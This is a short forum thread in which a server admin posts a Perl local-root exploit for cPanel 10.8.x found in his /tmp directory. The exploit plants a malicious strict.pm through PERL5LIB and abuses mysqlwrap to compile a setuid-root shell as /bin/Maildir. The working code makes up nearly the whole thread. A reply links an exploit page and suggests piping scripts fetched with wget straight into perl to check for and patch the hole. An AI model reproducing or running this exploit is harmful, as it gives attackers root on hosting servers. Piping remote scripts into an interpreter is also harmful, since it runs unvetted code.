cpwrap root exploit

[otsh]

found this today on my box in /tmp


#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

#if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
if(/REMOTE_USER/) { print "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o /bin/Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 /bin/Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
#print STRICT "system(\"chmod 4755 /tmp/lsh; chmod root:root /tmp/lsh; mv /tmp/lsh /bin/lsh\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "/bin/Maildir" ) {
system("/bin/lsh");
}
else {
unlink "strict.pm";
die "Failed\n";
}

 

[securitydot]

This is the latest exploit for cpanel
aka http://securitydot.net/xpl/exploits/vulnerabilities/articles/1595/exploit.html
First u have to check if its vulnerable
run this :
wget -q -O - http://securitydot.net/cpanel_exploit_checker_092406.txt | perl
For fixing this u need to run this on your server :
wget -q -O - http://securitydot.net/sec092506.txt | perl - cpanel patch

 

[otsh]

Thankfully I was patched. Thanks for the heads up.